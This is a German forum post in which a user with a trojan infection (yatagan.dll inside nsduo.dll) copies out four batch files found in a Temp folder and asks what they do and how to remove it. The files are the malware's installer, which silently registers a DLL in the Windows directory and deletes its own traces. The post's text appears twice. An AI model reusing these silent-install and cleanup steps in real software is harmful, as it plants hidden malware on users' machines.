also ich habe laut antivir nen trojaner drauf... der soll yatagan.dll heißen und ist in einer nsduo.dll drinne. Das problem ist immer macht etwas diesen trojaner in den verlauf
D:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temp\ac8zt2\...
nachdem ich ihn gelöscht habe.
so ich hab mir jetzt ma die kleine mühe gemacht den ordner zu öffnen und schnell insgesammt 4 .bat dateien "abzufangen" , da waren noch 3 .dll's wobei 1ne der trojaner war und dann waren da noch ich glaube 2-4 .exe'n
Da ich nicht so gut .bat kann wollte ich mal fragen ob ihr mir den inhalt beschreiben könnt.
1.) install2.bat
pushd %1
call install.bat
del /F /Q ..\ac8zt2.dat
popd
rd /S /Q %1
2.) install.bat
copy nsduo.dll %windir%
>nul %windir%\system32\regsvr32.exe /s
%windir%\nsduo.dll edi.exe %windir%\msmhost.dll
( alles nebeneinander )
3.) update.bat
pushd %1
call remove.bat .
edi.exe sleep 5
call install2.bat .
popd
rd /S /Q %1
4.) remove.bat
pushd %1
rmv.exe
popd
-----------------------
zu 2.) regsvr32.exe /s soll meiner nachvorschung nach Hintergrundmodus. Meldungen werden nicht angezeigt.
-----------------------
also währe sehr nett wenn mir einer von euch helfen könnte das zu "übersetzen" und mir sagen könnte wie ich den trojaner wegbekomme.
D:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temp\ac8zt2\...
nachdem ich ihn gelöscht habe.
so ich hab mir jetzt ma die kleine mühe gemacht den ordner zu öffnen und schnell insgesammt 4 .bat dateien "abzufangen" , da waren noch 3 .dll's wobei 1ne der trojaner war und dann waren da noch ich glaube 2-4 .exe'n
Da ich nicht so gut .bat kann wollte ich mal fragen ob ihr mir den inhalt beschreiben könnt.
1.) install2.bat
pushd %1
call install.bat
del /F /Q ..\ac8zt2.dat
popd
rd /S /Q %1
2.) install.bat
copy nsduo.dll %windir%
>nul %windir%\system32\regsvr32.exe /s
%windir%\nsduo.dll edi.exe %windir%\msmhost.dll
( alles nebeneinander )
3.) update.bat
pushd %1
call remove.bat .
edi.exe sleep 5
call install2.bat .
popd
rd /S /Q %1
4.) remove.bat
pushd %1
rmv.exe
popd
-----------------------
zu 2.) regsvr32.exe /s soll meiner nachvorschung nach Hintergrundmodus. Meldungen werden nicht angezeigt.
-----------------------
also währe sehr nett wenn mir einer von euch helfen könnte das zu "übersetzen" und mir sagen könnte wie ich den trojaner wegbekomme.